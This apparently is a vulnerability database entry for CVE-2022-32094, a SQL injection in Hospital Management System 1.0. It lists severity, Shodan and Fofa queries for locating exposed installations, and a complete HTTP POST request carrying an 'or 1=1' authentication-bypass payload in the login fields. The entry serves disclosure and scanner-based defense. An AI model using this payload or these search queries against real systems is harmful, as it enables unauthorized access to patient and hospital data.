| Title | Hospital Management System 1.0 - SQL Injection |
|---|---|
| Author | arafatansari |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.3543 |
| CVE ID | CVE-2022-32094 |
| CWE ID | CWE-89 |
| Shodan Query | http.html:"Hospital Management System"http.html:"hospital management system" |
| Fofa Query | body="hospital management system" |
| Tags | cve cve2022 hms cms sqli auth-bypass hospital_management_system_project vuln |
Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/doctor.php. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
POST /hms/doctor/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-32094.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-32094.pcap
N/AN/A